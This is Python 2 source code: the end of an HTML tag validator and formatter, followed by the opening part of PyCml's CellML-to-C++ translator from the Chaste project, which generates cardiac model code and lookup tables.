name = index < 3 and match.group(index) or None
yield (token, match.start(), match.end(), name)
offset = match.end()
if offset < len(source):
yield('text', offset, len(source), None)
def validate(path, source, tokens):
stack = []
def fail(reason, offset):
lineno = source.count('\n', 0, offset) + 1
print '%s:%s: error: %s' % (path, lineno, reason)
print source.splitlines()[lineno - 1]
sys.exit(1)
for token, start, end, name in tokens:
if token == 'open':
if hasendtag(name):
stack.append(name)
elif token == 'close':
if len(stack) == 0 or stack[-1] != name:
fail("close tag '%s' with open tags '%s'" %
(name, ' > '.join(stack)), start)
stack.pop()
if len(stack) > 0:
fail("end of file with open tags '%s'" %
(' > '.join(stack)), len(source) - 1)
class LineWriter:
def __init__(self, path):
self._file = open(path, 'w')
self._data = ''
self._startdepth = 0
def _writelines(self, depth):
lines = [depth * INDENT]
for word in self._data.strip().split():
if lines[-1].isspace() or len(lines[-1]) + len(word) <= COLUMNS:
lines[-1] += word + ' '
else:
lines.append(depth * INDENT + word + ' ')
self._file.write('\n'.join((l.rstrip() for l in lines)))
self._data = ''
def append(self, data):
self._data += data
def verbatim(self, data, depth):
if len(self._data) > 0:
mindepth = min(self._startdepth, depth)
self._writelines(mindepth)
self._file.write(mindepth * INDENT)
self._file.write(data)
def newline(self, depth):
self._writelines(min(self._startdepth, depth))
self._file.write('\n')
self._startdepth = depth
def normalize(path, source, tokens):
lw = LineWriter(path)
stack = []
def depth():
d = 0
for name, merge in stack:
if merge:
break
d += 1
return d
def merging():
for name, merge in stack:
if merge:
return True
return False
def preservespace():
for name, merge in stack:
if name in ('script', 'style', 'pre'):
return True
return False
for token, start, end, name in tokens:
didpreservespace = preservespace()
if token == 'open' and hasendtag(name):
# treat children as single line if followed by non-whitespace
merge = not source[end].isspace()
stack.append((name, merge))
elif token == 'close':
stack.pop()
data = source[start:end]
if preservespace() or didpreservespace:
lw.verbatim(data, depth())
elif token == 'text' and not merging():
# when merging() everything is mangled, but even when not merging(),
# consecutive non-empty lines of text are merged together into as
# few lines as possible.
mergelines = False
while len(data) > 0:
line, ending, data = data.partition('\n')
emptyline = len(line) == 0 or line.isspace()
lastline = len(data) == 0
if mergelines:
if emptyline:
lw.newline(depth())
else:
lw.append(' ')
mergelines = False
if line:
lw.append(line)
if ending:
if emptyline or lastline:
lw.newline(depth())
else:
mergelines = True
else:
lw.append(data)
assert len(stack) == 0
def format(path):
with open(path, 'r') as f:
source = f.read().rstrip() + '\n'
tokens = list(tokenize(source))
assert source == ''.join((source[t[1]:t[2]] for t in tokens))
validate(path, source, tokens)
normalize(path, source, tokens)
if __name__ == '__main__':
format(sys.argv[1])
|
# We want 1/2==0.5
from __future__ import division
"""Copyright (c) 2005-2015, University of Oxford.
All rights reserved.
University of Oxford means the Chancellor, Masters and Scholars of the
University of Oxford, having an administrative office at Wellington
Square, Oxford OX1 2JD, UK.
This file is part of Chaste.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the University of Oxford nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
"""
This part of PyCml deals with converting CellML models into
programming language code, primarily C++ compatible with Chaste, but
supporting a few other languages also (and easily extensible).
"""
import optparse
import os
import re
import time
import sys
from cStringIO import StringIO
# Common CellML processing stuff
import pycml
from pycml import * # Put contents in the local namespace as well
import optimize
import processors
import validator
__version__ = "$Revision: 24914 $"[11:-2]
def version_comment(note_time=True):
"""Generate a version comment, with optional time info."""
if note_time:
t = '\non ' + time.asctime()
else:
t = ''
text = """Processed by pycml - CellML Tools in Python
(translators: %s, pycml: %s, optimize: %s)%s""" % (
__version__, pycml.__version__, optimize.__version__, t)
return text
def debugexpr(e):
"For debugging."
v = None
if isinstance(e, cellml_variable):
v = e
elif isinstance(e, mathml_apply):
v = e.assigned_variable()
if v:
r = (v==e, v.name, v.get_usage_count())
else:
r = (False, '', -1)
return r
class TranslationError(RuntimeError):
"""Error thrown if CellML translation fails."""
pass
class ConfigurationError(ValueError):
"""Error thrown if configuration file is invalid."""
pass
class CellMLTranslator(object):
"""
Base class for translators from CellML to programming languages.
Provides various methods & attributes that can be overridden to
achieve the desired output language and style.
Also contains a registration system for subclasses, so the
command-line client can know what translators are available. See
the register method for more information.
"""
translators = {}
class NameAlreadyRegistered(ValueError):
pass
@classmethod
def register(cls, subclass, name):
"""Register a new translator subclass.
Registers the subclass `subclass' with name `name' in the
translators class attribute of CellMLTranslator. If the name
given is already in use, raises NameAlreadyRegistered.
"""
if name in cls.translators:
raise cls.NameAlreadyRegistered(name)
cls.translators[name] = subclass
return
@staticmethod
def generate_interface(doc, solver_info):
"""Generate an interface component connecting the model to whatever will use it.
Stub method that subclasses can override to implement this functionality.
"""
pass
###########################
# Various language tokens #
###########################
STMT_END = ';' # End of statement
EQ_ASSIGN = ' = ' # Assignment operator
COMMENT_START = '// ' # Start of a 1 line comment
DOXYGEN_COMMENT_START = '//! ' # Start of a 1 line Doxygen comment
# Variable types
TYPE_DOUBLE = 'double '
TYPE_VOID = 'void '
TYPE_CONST_DOUBLE = 'const double '
TYPE_CONST_UNSIGNED = 'const unsigned '
# Special constants
TRUE = 'true'
FALSE = 'false'
PI = 'M_PI'
E = 'M_E'
NOT_A_NUMBER = 'NAN' # GNU extension, but fairly common
# Whether the target language uses a subsidiary file, such as
# a header file in C/C++
USES_SUBSIDIARY_FILE = False
# Mapping from primary file extension to subsidiary file extension
FILE_EXTENSIONS = {'cpp': 'hpp',
'c': 'h',
'cxx': 'hxx'}
def __init__(self, add_timestamp=True, options=None):
"""Create a translator."""
self.options = options
# Initially output should not be indented
self.indent_level = 0
# Character to indent with
self.indent_char = ' '
# No. of occurrences of indent_char per indent_level
self.indent_factor = 4
# Whether to use lookup tables where possible
self.use_lookup_tables = True
# Whether to add a timestamp comment to generated files
self.add_timestamp = add_timestamp
# Main output goes to the main file by default
self._main_output_to_subsidiary = False
def error(self, lines, xml=None):
"""Raise a translation error.
lines is a list of strings describing what went wrong.
A TranslationError with that message will be raised.
If xml is given, it should be an element, which will be
pretty-printed and included in the error.
"""
if xml is not None:
lines.extend(xml.xml(indent = u'yes',
omitXmlDeclaration = u'yes').split('\n'))
raise TranslationError('\n'.join(lines))
@property
def config(self):
"""Get the current document's configuration store."""
return getattr(self.doc, '_cml_config', None)
def translate(self, doc, model_filename, output_filename=None,
subsidiary_file_name=None,
class_name=None, v_variable=None,
continuation=None,
lookup_method_prefix='', row_lookup_method=False,
lt_index_uses_floor=True, constrain_table_indices=False):
"""Generate code for the given model.
doc should be an instance of cellml_model representing a
valid CellML model, such as might be produced from a call
to
>>> valid, doc = validator.CellMLValidator().validate(
... model_filename, True)
model_filename is the filename of the input model.
The output program will by default be generated in the same
folder, but with a different extension. This can be
overridden by supplying the output_filename keyword argument.
By default the name of the class representing the model will
be derived from the model name. This can be overridden by
passing an alternative as the class_name argument.
The variable representing the transmembrane potential should
be passed in using the v_variable argument.
By default this method will perform some setup and then call
self.output_top_boilerplate()
self.output_mathematics()
self.output_bottom_boilerplate()
To alter this, pass a callable as the continuation parameter;
this will then be called instead.
lookup_method_prefix and row_lookup_method can be used to
customise some aspects of lookup table usage. The former is
used by the Chaste translator to place lookup tables within a
singleton class, while the latter can improve cache
performance by looking up all tables in a single call, and
returning an array of the results.
lt_index_uses_floor specifies whether to use the floor()
function to calculate the index into the lookup tables, or
just cast to unsigned.
constrain_table_indices specifies whether to throw an
exception if lookup table index variables go outside the
bounds specified (default), or just to cap them at the bounds.
"""
self.doc = doc
self.model = doc.model
# Name of the class that will represent this model
if class_name is None:
self.class_name = u'CML_' + doc.model.name.replace('-', '_')
else:
self.class_name = class_name
# Figure out the free & state vars in this model
self.free_vars = doc.model.find_free_vars()
self.state_vars = doc.model.find_state_vars()
if len(self.free_vars) > 1:
self.error(["Model has more than one free variable; exiting.",
"Free vars:" + str(self.free_vars)])
if len(self.free_vars) == 0:
if self.model.get_option('protocol'):
# We may be dealing with an algebraic model; check for an Unknown variable
for var in self.model.get_all_variables():
if var.get_type() == VarTypes.Unknown:
self.free_vars.append(var)
if len(self.free_vars) != 1:
self.error(["Model has no free variable; exiting."])
# If only a single component, don't add it to variable names
self.single_component = (len(getattr(self.model, u'component', [])) == 1)
# Find the (index of the) transmembrane potential
self.v_variable = v_variable
if self.v_variable:
self.v_variable_name = (v_variable.component.name, v_variable.name)
else:
self.v_variable = None
for i, var in enumerate(self.state_vars):
if var is v_variable:
self.v_index = i
break
else:
self.v_index = -1
# Check to see if we're using lookup tables
self.lookup_method_prefix = lookup_method_prefix
self.row_lookup_method = row_lookup_method
self.lt_index_uses_floor = lt_index_uses_floor
self.constrain_table_indices = constrain_table_indices
self.scan_for_lookup_tables()
if not doc.lookup_tables:
# No tables found
self.use_lookup_tables = False
# Extra configuration hook
self.final_configuration_hook()
# Open the output file(s)
if output_filename is None:
output_filename = self.output_file_name(model_filename)
if self.USES_SUBSIDIARY_FILE:
output_filename, self.subsidiary_filename = self.subsidiary_file_name(output_filename)
self.output_filename = output_filename
self.out = open_output_stream(output_filename)
if self.USES_SUBSIDIARY_FILE:
self.out2 = open_output_stream(self.subsidiary_filename)
# Translate
if continuation:
continuation()
else:
self.output_top_boilerplate()
self.output_mathematics()
self.output_bottom_boilerplate()
close_output_stream(self.out)
if self.USES_SUBSIDIARY_FILE:
close_output_stream(self.out2)
return
def final_configuration_hook(self):
"""A hook for subclasses to do some final configuration."""
return
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
return os.path.splitext(model_filename)[0] + '.cpp'
def subsidiary_file_name(self, output_filename):
"""Generate a name for the subsidiary output file, based on the main one.
Returns a pair (main_output_file_name, subsidiary_file_name). This is in
case the user specifies (e.g.) a .hpp file as the main output - we consider
the main output to be the .cpp file.
"""
base, ext = os.path.splitext(output_filename)
ext = ext[1:] # Remove the '.'
try:
new_ext = self.FILE_EXTENSIONS[ext]
swap = False
except KeyError:
swap = True
for key, val in self.FILE_EXTENSIONS.iteritems():
if val == ext:
new_ext = key
break
else:
# Turn off usage of subsidiary file
self.USES_SUBSIDIARY_FILE = False
return output_filename, None
subsidiary_filename = base + '.' + new_ext
if swap:
output_filename, subsidiary_filename = subsidiary_filename, output_filename
return output_filename, subsidiary_filename
def send_main_output_to_subsidiary(self, to_subsidiary=True):
"""Set subsequent main-file writes to go to the subsidiary file instead.
Supplying a False argument reverts this setting.
Has no effect if not using a subsidiary file.
"""
self._main_output_to_subsidiary = to_subsidiary
def writeln(self, *args, **kwargs):
"""Write a line to our output file.
Takes any number of strings as input, and writes them out to file.
Unless the keyword argument indent is given as False, then the
output will be indented to the level set by self.set_indent().
Setting indent_level will override this value.
Setting indent_offset will adjust the current level temporarily.
If nl is set to False then a newline character will not be
appended to the output.
If subsidiary=True, then the line will be written to the subsidiary
output file instead of the main one. An error will be raised if
there is no subsidiary output file.
"""
if kwargs.get('subsidiary', False) or self._main_output_to_subsidiary:
if not self.USES_SUBSIDIARY_FILE:
self.error('Tried to write to non-existent subsidiary file')
else:
target = self.out2
else:
target = self.out
indent = kwargs.get('indent', True)
nl = kwargs.get('nl', True)
if indent:
level = kwargs.get('indent_level', self.indent_level)
level += kwargs.get('indent_offset', 0)
target.write(self.indent_char * self.indent_factor * level)
target.write(''.join(map(str, args)))
if nl:
target.write('\n')
def write(self, *args):
"""Write to our output file.
This variant does not indent the output, or add a newline.
"""
self.writeln(indent=False, nl=False, *args)
def capture_output(self):
"""Make subsequent output operations write to a string buffer."""
self._original_out = self.out
self.out = StringIO()
def get_captured_output(self):
"""Stop capturing output, and return what was captured as a string."""
output = self.out.getvalue()
self.out = self._original_out
return output
def output_comment(self, *args, **kwargs):
"""Output a (multi-line) string as a comment."""
start = kwargs.get('start', self.COMMENT_START)
if kwargs.get('pad', False):
start = ' ' + start
comment = ''.join(map(str, args))
lines = comment.split('\n')
for line in lines:
self.writeln(start, line, **kwargs)
def output_doxygen(self, *args, **kwargs):
"""Output a (multi-line) string as a Doxygen comment."""
kwargs['start'] = self.DOXYGEN_COMMENT_START
self.output_comment(*args, **kwargs)
def set_indent(self, level=None, offset=None):
"""Set the indentation level for subsequent writes.
If offset is given, adjust the level by that amount, otherwise
set it to an absolute value.
"""
if offset is not None:
self.indent_level += offset
else:
self.indent_level = level
def code_name(self, var, ode=False, prefix=None):
"""
Return the full name of var in a form suitable for inclusion in a
source file.
If ode is True then return the name of the derivative of var
instead. We go directly to the source variable in this case,
rather than including intermediate assignment statements as is
done for connections.
"""
if prefix is None:
prefix = ['var_', 'd_dt_'][ode]
if ode:
var = var.get_source_variable(recurse=True)
name = prefix + var.fullname(cellml=True)
return name
def varobj(self, varname):
"""Return the variable object that has code_name varname."""
return cellml_variable.get_variable_object(self.model, varname)
def var_display_name(self, var):
"""Return a display name for the given variable.
If it has an oxmeta name, uses that. Otherwise uses the cmeta:id if present, or the name
attribute if not. If there is an interface component, strip the name of it out of the
display name.
"""
# TODO: support other ontologies too?
if var.oxmeta_name:
name = var.oxmeta_name
elif hasattr(var, u'id') and var.id:
name = var.id
else:
name = var.name
iface = getattr(self.model, 'interface_component_name', '#N/A#')
if name.startswith(iface):
name = name[len(iface)+2:]
return name
@property
def include_guard(self):
"""
Get the include guard (for C/C++ output) for this cell model,
based on the class name.
"""
return self.class_name.upper() + '_HPP_'
def output_top_boilerplate(self):
"""Output top boilerplate."""
self.writeln('#ifndef _', self.include_guard, '_')
self.writeln('#define _', self.include_guard, '_\n')
self.output_comment('Model: ', self.model.name)
self.output_comment(version_comment(self.add_timestamp))
self.writeln()
self.writeln('#include <cmath>')
self.writeln('#include "AbstractOdeSystem.hpp"')
self.writeln('#include "Exception.hpp"')
self.writeln('#include "AbstractStimulusFunction.hpp"\n')
self.writeln('class ', self.class_name, ' : public AbstractOdeSystem')
self.writeln('{')
self.writeln('private:')
self.writeln('AbstractStimulusFunction *mpStimulus;\n',
indent_offset=1)
self.writeln('public:')
self.set_indent(1)
self.writeln('const static unsigned _NB_OF_STATE_VARIABLES_ = ',
str(len(self.state_vars)), ';\n')
self.writeln('//', ('-'*66))
self.writeln('// Methods')
self.writeln('//', ('-'*66), '\n')
# Constructor
self.writeln('', self.class_name,
'(AbstractStimulusFunction *stim)')
self.writeln(' : AbstractOdeSystem(_NB_OF_STATE_VARIABLES_, ',
self.v_index, ')')
self.open_block()
self.writeln('mpStimulus = stim;\n')
for var in self.state_vars:
self.writeln('mVariableNames.push_back("', var.name, '");')
self.writeln('mVariableUnits.push_back("', var.units, '");')
init_val = getattr(var, u'initial_value', None)
if init_val is None:
init_comm = ' // Value not given in model'
# Don't want compiler error, but shouldn't be a real number
init_val = self.NOT_A_NUMBER
else:
init_comm = ''
self.writeln('mInitialConditions.push_back(', init_val, ');',
init_comm, '\n')
if self.use_lookup_tables: self.output_lut_generation()
self.close_block()
# Destructor
self.writeln('~', self.class_name, '(void)')
self.open_block()
if self.use_lookup_tables: self.output_lut_deletion()
self.close_block()
# Lookup table declarations & methods
if self.use_lookup_tables:
self.output_lut_declarations()
self.output_lut_methods()
# Evaluation function
self.writeln('void EvaluateYDerivatives (')
self.writeln(' double ', self.code_name(self.free_vars[0]), ',')
self.writeln(' const std::vector<double> &rY,')
self.writeln(' std::vector<double> &rDY)')
self.open_block()
self.writeln('// Inputs:')
self.writeln('// Time units: ', self.free_vars[0].units)
for i, var in enumerate(self.state_vars):
self.writeln('double ', self.code_name(var),
' = rY[', str(i), '];')
self.writeln('// Units: ', var.units, '; Initial value: ',
getattr(var, u'initial_value', 'Unknown'))
self.writeln()
if self.use_lookup_tables:
self.output_table_index_generation()
return
def output_mathematics(self):
"""Output the mathematics in this model."""
self.writeln(self.COMMENT_START, 'Mathematics')
for expr in self.model.get_assignments():
# Check this expression is actually used; don't output if not
var = None
if isinstance(expr, mathml_apply) and expr.is_assignment():
var = expr.assigned_variable()
elif isinstance(expr, cellml_variable):
var = expr
if not (var and var.get_usage_count() == 0):
self.output_assignment(expr)
return
def output_bottom_boilerplate(self):
"""Output bottom boilerplate"""
self.writeln('\n')
for i, var in enumerate(self.state_vars):
self.writeln('rDY[', str(i), '] = ', self.code_name(var, True),
';')
self.close_block()
self.set_indent(offset=-1)
self.writeln('};\n')
self.writeln('#endif')
return
def output_assignment(self, expr):
"""Output an assignment expression."""
if isinstance(expr, cellml_variable):
# This may be the assignment of a mapped variable, or a constant
t = expr.get_type()
if t == VarTypes.Mapped:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(expr),
self.EQ_ASSIGN,
self.code_name(expr.get_source_variable()),
self.STMT_END, nl=False)
self.output_comment(expr.units, indent=False, pad=True)
elif t == VarTypes.Constant:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(expr),
self.EQ_ASSIGN, nl=False)
self.output_number(expr.initial_value)
self.writeln(self.STMT_END, indent=False, nl=False)
self.output_comment(expr.units, indent=False, pad=True)
else:
# This is a mathematical expression
self.writeln(self.TYPE_CONST_DOUBLE, nl=False)
opers = expr.operands()
self.output_lhs(opers.next())
self.write(self.EQ_ASSIGN)
self.output_expr(opers.next(), False)
self.writeln(self.STMT_END, indent=False, nl=False)
#1365: add a comment with the LHS units
self.output_comment(expr._get_element_units(expr.eq.lhs, return_set=False).description(),
indent=False, pad=True)
def output_lhs(self, expr):
"""Output the left hand side of an assignment expression."""
if expr.localName == 'ci':
self.output_variable(expr)
elif expr.operator().localName == 'diff':
self.write(self.code_name(expr.operator().dependent_variable, ode=True))
def output_variable(self, ci_elt, ode=False):
"""Output a ci element, i.e. a variable lookup."""
self.write(self.code_name(ci_elt.variable, ode=ode))
def output_expr(self, expr, paren):
"""Output the expression expr.
If paren is True then the context has requested parentheses around the
output; if expr requires them then they will be added.
"""
if self.use_lookup_tables and self.is_lookup_table(expr):
self.output_table_lookup(expr, paren)
elif isinstance(expr, mathml_apply):
self.output_apply(expr, paren)
elif isinstance(expr, mathml_piecewise):
self.output_piecewise(expr, paren)
elif isinstance(expr, mathml_ci):
self.output_variable(expr)
elif expr.localName == u'cn':
self.output_number(expr)
elif expr.localName == u'degree':
# <degree> is just a wrapper around an expression
self.output_expr(child_i(expr, 1), paren)
elif expr.localName == u'logbase':
# <logbase> is just a wrapper around an expression
self.output_expr(child_i(expr, 1), paren)
elif expr.localName == u'true':
self.write(self.TRUE)
elif expr.localName == u'false':
self.write(self.FALSE)
elif expr.localName == u'pi':
self.write(self.PI)
elif expr.localName == u'exponentiale':
self.write(self.E)
else:
self.error(["Unsupported expression element " + expr.localName],
xml=expr)
def output_number(self, expr):
"""Output the plain number expr.
We make all constants parse as doubles to avoid problems with
integer division or numbers too large for the int type.
Negative numbers will be prefixed by a space to avoid unwanted
decrement operations.
"""
n = self.eval_number(expr)
num = "%.17g" % n
if num[0] == '-':
num = ' ' + num
if not '.' in num and not 'e' in num:
num = num + '.0'
self.write(num)
def eval_number(self, expr):
"""Evaluate a number.
If a (unicode) string, convert to float.
If a cn element, call its evaluate method.
"""
if isinstance(expr, mathml_cn):
return expr.evaluate()
else:
return float(unicode(expr))
# Map from operator element names to C++ function names,
# where the translation is straightforward.
function_map = {'power': 'pow', 'abs': 'fabs', 'ln': 'log', 'exp': 'exp',
'floor': 'floor', 'ceiling': 'ceil',
'factorial': 'factorial', # Needs external definition
'not': '!', 'rem': 'fmod',
'sin': 'sin', 'cos': 'cos', 'tan': 'tan',
'sec': '1/cos', 'csc': '1/sin', 'cot': '1/tan',
'sinh': 'sinh', 'cosh': 'cosh', 'tanh': 'tanh',
'sech': '1/cosh', 'csch': '1/sinh', 'coth': '1/tanh',
'arcsin': 'asin', 'arccos': 'acos', 'arctan': 'atan',
'arcsinh': 'asinh', 'arccosh': 'acosh', 'arctanh': 'atanh'}
# Inverse reciprocal trig functions; these are represented by
# key(x) = function_map[val](1/x)
recip_trig = {'arcsec': 'arccos', 'arccsc': 'arcsin', 'arccot': 'arctan',
'arcsech': 'arccosh', 'arccsch': 'arcsinh', 'arccoth': 'arctanh'}
# Operators
nary_ops = {'plus': '+', 'times': '*',
'and': '&&', 'or': '||'}
binary_ops = {'divide': '/',
'xor': '!=', 'eq': '==', 'neq': '!=',
'geq': '>=','leq': '<=','gt': '>','lt': '<'}
def output_apply(self, expr, paren):
"""Output an <apply> expression.
paren is True if the context has requested parentheses.
"""
op = expr.operator()
if op.localName in self.function_map:
self.output_function(self.function_map[op.localName],
expr.operands(), paren)
elif op.localName in self.recip_trig:
self.output_function(self.function_map[self.recip_trig[op.localName]],
expr.operands(), paren, reciprocal=True)
elif op.localName == u'root':
self.output_root(expr, paren)
elif op.localName == u'log':
self.output_log(expr, paren)
elif op.localName in self.nary_ops:
self.output_nary_operator(self.nary_ops[op.localName],
expr.operands(), paren)
elif op.localName in self.binary_ops:
self.output_binary_operator(self.binary_ops[op.localName],
expr.operands(), paren, expr)
elif op.localName == u'minus':
self.output_minus(expr, paren)
elif op.localName == u'diff':
# ODE occuring on the RHS
self.write(self.code_name(op.dependent_variable, ode=True))
else:
# Unrecognised operator
self.error(["Unsupported operator element " + str(op.localName)], xml=expr)
def output_function(self, func_name, args, paren, reciprocal=False):
"""Output a function call with name func_name and arguments args.
Parentheses are not required so paren is ignored.
If reciprocal is True then pass the reciprocal of each arg to
func_name.
"""
self.write(func_name + '(')
comma = False
for arg in args:
if comma: self.write(', ')
else: comma = True
if reciprocal:
self.write('1/')
self.output_expr(arg, True)
else:
self.output_expr(arg, False)
self.write(')')
def output_nary_operator(self, operator, operands, paren):
"""Output an n-ary operator (using infix notation).
If paren is True, enclose the output in parentheses.
"""
# TODO: Optimise - to use expm1(x) for computing exp(x)-1
self.open_paren(paren)
op = False
for operand in operands:
if op: self.write(' ' + operator + ' ')
else: op = True
self.output_expr(operand, True)
self.close_paren(paren)
def output_unary_operator(self, operator, operand, paren):
"""Output a unary operator (using prefix notation)."""
self.open_paren(paren)
self.write(operator)
self.output_expr(operand, True)
self.close_paren(paren)
def output_binary_operator(self, operator, operands, paren, expr):
"""Output a binary operator.
As output_nary_operator, but checks that len(list(operands)) == 2.
"""
operands = list(operands)
if len(operands) != 2:
self.error(["Binary operator" + operator +
"does not have 2 operands."], xml=expr)
self.output_nary_operator(operator, operands, paren)
special_roots = {2: 'sqrt', 3: 'cbrt'}
def output_root(self, expr, paren):
"""Output a root taken to some degree.
If a degree qualifier element is not provided, uses default 2.
"""
if hasattr(expr, u'degree'):
# A degree is given. Compute x^(1/b)
# TODO: Optimise for when b==2 (sqrt) or b==3 (cbrt)
# Try to evaluate expr.degree, and if the result is a key
# of self.special_roots, use the value as the function to call.
self.write('pow(')
self.output_expr(expr.operands().next(), False)
self.write(', 1/')
self.output_expr(expr.degree, True)
self.write(')')
else:
# Compute square root
self.output_function('sqrt', expr.operands(), paren)
def output_log(self, expr, paren):
"""Output a logarithm to the given base, which defaults to base 10."""
if hasattr(expr, u'logbase'):
# A base is provided. Use the identity log_b(x) = log(x)/log(b)
# TODO: Optimise for log2(x)
self.open_paren(paren)
self.output_function('log', expr.operands(), paren)
self.write('/log(')
self.output_expr(expr.logbase, False)
self.write(')')
self.close_paren(paren)
else:
# Use base 10
self.output_function('log10', expr.operands(), paren)
def output_minus(self, expr, paren):
"""Output either a unary or binary minus.
Which is chosen depends on the number of operands.
"""
operands = list(expr.operands())
if len(operands) == 1:
self.output_unary_operator('-', operands[0], paren)
else:
self.output_binary_operator('-', operands, paren, expr)
def output_piecewise(self, expr, paren):
"""Output the piecewise expression expr.
We use a cascading ternary if expression for simplicity.
"""
self.open_paren(paren)
for piece in getattr(expr, u'piece', []):
self.output_expr(child_i(piece, 2), True) # Condition
self.write(' ? ')
self.output_expr(child_i(piece, 1), True) # Result
self.write(' : ')
if hasattr(expr, u'otherwise'):
self.output_expr(child_i(expr.otherwise, 1), True) # Default case
else:
self.write(self.NOT_A_NUMBER)
self.close_paren(paren)
def open_paren(self, paren):
if paren: self.write('(')
def close_paren(self, paren):
if paren: self.write(')')
def open_block(self, **kwargs):
"""Open a new code block and increase indent."""
self.writeln('{', **kwargs)
self.set_indent(offset=1)
def close_block(self, blank_line=True, **kwargs):
"""Close a code block and decrease indent."""
self.set_indent(offset=-1)
self.writeln('}', **kwargs)
if blank_line:
self.writeln(**kwargs)
return
##############################
# Dependency related methods #
##############################
# These methods allow us to calculate which equations must be
# output in order to compute a given set of quantities.
def calculate_extended_dependencies(self, nodes, prune=[], prune_deps=[]):
"""Method moved to cellml_model."""
return self.model.calculate_extended_dependencies(nodes, prune, prune_deps)
def output_equations(self, nodeset):
"""Output the mathematics described by nodeset.
nodeset represents a subset of the assignments in the model.
Output assignments in the order given by a topological sort,
but only include those in nodeset.
Since a set of assignments is given, this method does not
check whether variables are used - it is assumed that only
assignments that are actually wanted are given in nodeset.
"""
for expr in (e for e in self.model.get_assignments() if e in nodeset):
self.output_assignment(expr)
return
def _vars_in(self, expr):
"""Return a set of variable objects used in the given expression.
Will include state variables. If the expression includes a derivative, the defining equation
for that derivative will be included in the set. Also if an expression is being
replaced by a lookup table, this will only include the table key variable.
"""
res = set()
if self.use_lookup_tables and isinstance(expr, mathml) and self.is_lookup_table(expr):
key_var = self.varobj(expr.getAttributeNS(NSS['lut'], u'var'))
key_var = key_var.get_source_variable(recurse=True)
res.add(key_var)
elif isinstance(expr, mathml_ci):
varobj = getattr(expr, '_cml_variable', None)
if not varobj:
varname = unicode(expr)
varobj = self.varobj(varname.strip())
if varobj:
res.add(varobj)
elif isinstance(expr, mathml_apply) and expr.operator().localName == u'diff':
dep_varname = unicode(expr.ci)
varobj = self.varobj(dep_varname.strip())
res.add(varobj.get_ode_dependency(self.free_vars[0]))
elif hasattr(expr, 'xml_children'):
for child in expr.xml_children:
res.update(self._vars_in(child))
return res
########################
# Lookup table methods #
########################
# Lookup tables should be done in a cache- and memory-
# efficient manner.
#
# Cache: Have one block of memory allocated for all tables with a
# given index variable, such that entries are found at i*N+j,
# where N is the no. of tables in the block, i is the index into a
# table, and j is the table to read. Change how lookups are done,
# such that the lookup method is called once and returns a pointer
# to the (i*N)'th entry. Places where we now call the method then
# index this pointer by j.
# The 'one block' part is done by default.
# The better lookup method is activated by --row-lookup-method.
#
# Memory: Extract the lookup tables into a separate class (in the
# same .cpp file though). This can then be made a singleton class
# in a multi-cellular context.
# Chaste code generation has the option to do this, enabled by
# default. Use --no-separate-lut-class to disable.
def scan_for_lookup_tables(self):
"""Search for lookup tables used in this document.
Store a list of suitable expressions on the document root.
Generate a dictionary mapping tables to their index variables.
"""
doc = self.doc
# Get list of suitable expressions
doc.lookup_tables = doc.xml_xpath(u"//*[@lut:possible='yes']")
doc.lookup_tables.sort(cmp=element_path_cmp)
# Map table keys (min, max, step, var) to an index variable
doc.lookup_table_indexes = {}
# Count the no. of lookup tables with each index variable
doc.lookup_tables_num_per_index = {}
if not doc.lookup_tables:
# If no suitable expressions, we're done
return
# Search for table index variables already assigned
table_indexes = [int(getattr(expr, u'table_index', -1))
for expr in doc.lookup_tables]
tidx = max(table_indexes) + 1
# Search for table names already assigned
table_numbers = {}
for expr in doc.lookup_tables:
if hasattr(expr, u'table_name'):
idx = expr.table_index
table_numbers[idx] = max(table_numbers.get(idx, 0), 1 + int(expr.table_name))
# Now assign new names, and construct mapping from tables to index variables
for expr in doc.lookup_tables:
# Get a suitable table index variable
comp = expr.get_component()
var = comp.get_variable_by_name(expr.var)
var = var.get_source_variable(recurse=True)
key = (expr.min, expr.max, expr.step, var)
if not key in doc.lookup_table_indexes:
var._cml_modifiable = True # Table index variables shouldn't be const, in case we constrain to table bounds
if hasattr(expr, u'table_index'):
doc.lookup_table_indexes[key] = expr.table_index
else:
doc.lookup_table_indexes[key] = unicode(tidx)
tidx += 1
expr.xml_set_attribute((u'lut:table_index', NSS['lut']),
doc.lookup_table_indexes[key])
# Get a table name, unique over all tables with this index variable
if not hasattr(expr, u'table_name'):
tnum = table_numbers.get(doc.lookup_table_indexes[key], 0)
expr.xml_set_attribute((u'lut:table_name', NSS['lut']), unicode(tnum))
table_numbers[doc.lookup_table_indexes[key]] = tnum + 1
# Re-number table indices so they are contiguous starting from 0.
table_index_map = {}
table_name_map = {}
tidx = 0
for key in sorted(doc.lookup_table_indexes.keys()):
idx = unicode(tidx)
table_index_map[doc.lookup_table_indexes[key]] = idx
table_name_map[idx] = {}
doc.lookup_table_indexes[key] = idx
doc.lookup_tables_num_per_index[idx] = 0
tidx += 1
# Make sure each lookup table is only listed once in doc.lookup_tables,
# so we don't get 2 tables for the same expression!
# Also re-number table names so they are contiguous starting from 0 for each table index.
